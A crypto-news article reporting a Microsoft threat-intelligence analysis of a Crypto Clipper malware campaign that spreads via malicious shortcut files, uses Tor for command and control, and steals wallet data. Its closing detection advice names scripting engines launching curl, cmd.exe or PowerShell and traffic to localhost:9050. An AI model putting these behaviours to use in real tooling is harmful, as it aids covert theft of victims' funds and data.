- Crypto Clipper uses Tor for secret commands, spreads like a worm, and opens backdoors.
- With Tor, attackers can hide their tracks and make it harder to be shut down.
- Hackers have been using malicious shortcut files (.lnk) to infect devices since Feb 2026.
Microsoft Threat Intelligence team has released a report on a new, highly advanced Crypto Clipper malware campaign that goes beyond the standard clipboard hijacking techniques.
Unlike older clipper malware that simply swaps cryptocurrency wallet addresses, this campaign uses Tor for secret commands, spreads like a worm, digs in deep, and opens backdoors, making it a much larger threat.
Crypto clippers used to be seen as pretty basic malware. In a typical clipper attack, the victim copies a crypto wallet address, the malware monitors the clipboard, swaps it for the attacker’s address, and the victim ends up sending their crypto to the wrong person without realizing it.
However, Microsoft’s report shows attackers are moving past the old clipper playbook. The newest campaign turns it into a full‑blown intrusion tool that is able to keep access over time, move across networks, hide its tracks, launch more attacks, and back up bigger criminal schemes.
Tor-Based Command and Control
One of the most notable developments is the use of Tor. For attackers, that means they can hide where their servers really are, make it harder to shut them down, obfuscate network traffic, and cover their tracks when someone tries to figure out who they are.
In contrast, traditional malware depended on domains or IPs that security teams could eventually block. Tor‑based malware can constantly switch to new hidden addresses, staying alive even if part of the network gets taken out.
An additional problem with this setup is that a lot of companies aren’t watching Tor traffic closely. If an endpoint suddenly begins communicating through Tor, it could be a sign of malware, data being stolen, a backdoor, or a hacker sending commands.
Microsoft reports that since February 2026, hackers have been using malicious shortcut files (.lnk) to infect devices with crypto clipper malware. Once inside, it drops two pieces: one that spreads to other systems, and one that steals wallet info and sends it back to the attackers.
According to the tech giant, security teams should focus on behavioral detection over static malware signatures. The company notes it’s important to investigate systems where scripting engines (such as WScript or CScript) launch curl, cmd.exe, PowerShell, or other unexpected executables.
Also, any traffic to localhost:9050 combined with odd script activity is a strong red flag worth an investigation.
Related: Microsoft Flags Two Malicious npm Packages Targeting Crypto Wallets
Disclaimer: The information presented in this article is for informational and educational purposes only. The article does not constitute financial advice or advice of any kind. Coin Edition is not responsible for any losses incurred as a result of the utilization of content, products, or services mentioned. Readers are advised to exercise caution before taking any action related to the company.
